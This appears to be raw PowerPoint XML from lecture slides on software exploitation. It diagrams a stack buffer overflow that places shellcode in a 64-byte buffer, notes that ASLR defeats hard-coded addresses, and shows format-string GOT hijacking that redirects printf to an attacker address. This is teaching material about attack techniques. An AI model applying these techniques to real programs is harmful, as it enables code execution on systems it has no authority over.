              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6434415" y="1400808"/>
                <a:ext cx="1600493" cy="353975"/>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smtClean="0"/>
                  <a:t>caller’s </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                  <a:t>ebp</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="TextBox 45"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6434415" y="1754783"/>
                <a:ext cx="1600493" cy="3436564"/>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buf</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16406" name="TextBox 46"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm rot="16200000">
                <a:off x="6183345" y="3617513"/>
                <a:ext cx="219267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000" dirty="0" err="1">
                    <a:latin typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Shellcode</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="4000" dirty="0">
                  <a:latin typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16407" name="TextBox 47"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7973829" y="4843453"/>
                <a:ext cx="11217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0xffffe3f8</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16408" name="TextBox 48"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7988949" y="1696796"/>
                <a:ext cx="1137058" cy="369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0xffffe428</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Freeform 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8074602" y="1027787"/>
                <a:ext cx="876460" cy="5169926"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 30241 w 500608"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 5593739"/>
                  <a:gd name="connsiteX1" fmla="*/ 438489 w 500608"/>
                  <a:gd name="connsiteY1" fmla="*/ 1602530 h 5593739"/>
                  <a:gd name="connsiteX2" fmla="*/ 453609 w 500608"/>
                  <a:gd name="connsiteY2" fmla="*/ 4762237 h 5593739"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 500608"/>
                  <a:gd name="connsiteY3" fmla="*/ 5593739 h 5593739"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX3" y="connsiteY3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="500608" h="5593739">
                    <a:moveTo>
                      <a:pt x="30241" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="199084" y="404412"/>
                      <a:pt x="367928" y="808824"/>
                      <a:pt x="438489" y="1602530"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="509050" y="2396236"/>
                      <a:pt x="526690" y="4097036"/>
                      <a:pt x="453609" y="4762237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380528" y="5427438"/>
                      <a:pt x="0" y="5593739"/>
                      <a:pt x="0" y="5593739"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="8E2800"/>
                </a:solidFill>
                <a:prstDash val="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6410" name="TextBox 53"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7912648" y="6172831"/>
                <a:ext cx="11859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0xffffd5d8</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="608013"/>
            <a:ext cx="1600200" cy="793750"/>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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(0xffffd5d8)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="608013"/>
            <a:ext cx="1600200" cy="53213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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1401763"/>
            <a:ext cx="1600200" cy="354012"/>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smtClean="0"/>
              <a:t>caller’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1755775"/>
            <a:ext cx="1600200" cy="3435350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cmpd="sng">
            <a:prstDash val="lgDash"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="90488" y="4864100"/>
            <a:ext cx="7556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latin typeface="Calibri"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769938" y="1874838"/>
            <a:ext cx="258762"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6392" name="TextBox 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-44450" y="1674813"/>
            <a:ext cx="8731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latin typeface="Calibri"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>[63]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16393" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="778669" y="3617119"/>
            <a:ext cx="2192337"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000" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="TextBox 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2568575" y="4843463"/>
            <a:ext cx="11858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0xffffd5d8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17453" name="Rounded Rectangular Callout 17452"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="317500"/>
            <a:ext cx="3108324" cy="1247775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5045"/>
              <a:gd name="adj2" fmla="val 115821"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="38100" cmpd="sng">
            <a:no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Address Space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Layout Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769938" y="5067300"/>
            <a:ext cx="258762"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6397" name="TextBox 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2584450" y="1697038"/>
            <a:ext cx="11858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a:rPr>
              <a:t>0xffffd618</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6538569" y="6019800"/>
            <a:ext cx="1233831" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oops…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2510681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3"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GOT Hijacking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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>usr_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>);</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dynamic_linker_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2111771"/>
            <a:ext cx="2608440"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solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="6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773676"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520" y="3758776"/>
            <a:ext cx="2763729" cy="1015180"/>
            <a:chOff x="671520" y="3758776"/>
            <a:chExt cx="2763729" cy="1015180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangular Callout 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671521" y="3758776"/>
              <a:ext cx="2763728" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 21195"/>
                <a:gd name="adj2" fmla="val -178426"/>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ectangular Callout 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671520" y="3758776"/>
              <a:ext cx="2763729" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 132576"/>
                <a:gd name="adj2" fmla="val -46678"/>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Use the format string to overwrite a GOT entry</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5435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GOT Hijacking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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>usr_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>);</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any_attacker_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2111771"/>
            <a:ext cx="2608440"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solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="6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481709"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520" y="3758776"/>
            <a:ext cx="2763729" cy="1015180"/>
            <a:chOff x="671520" y="3758776"/>
            <a:chExt cx="2763729" cy="1015180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangular Callout 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671521" y="3758776"/>
              <a:ext cx="2763728" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 21195"/>
                <a:gd name="adj2" fmla="val -178426"/>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ectangular Callout 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671520" y="3758776"/>
              <a:ext cx="2763729" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 132576"/>
                <a:gd name="adj2" fmla="val -46678"/>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Use the format string to overwrite a GOT entry</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3241152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GOT Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1819783"/>
            <a:ext cx="2978050" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>usr_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“world\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="1819783"/>
            <a:ext cx="4423279" cy="369332"/>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printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> GOT[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="2835446"/>
            <a:ext cx="4423279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>any_attacker_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2652955"/>
            <a:ext cx="2608440"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57200" y="5469717"/>
            <a:ext cx="4423279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5036743"/>
            <a:ext cx="4423279" cy="432974"/>
          </a:xfrm>
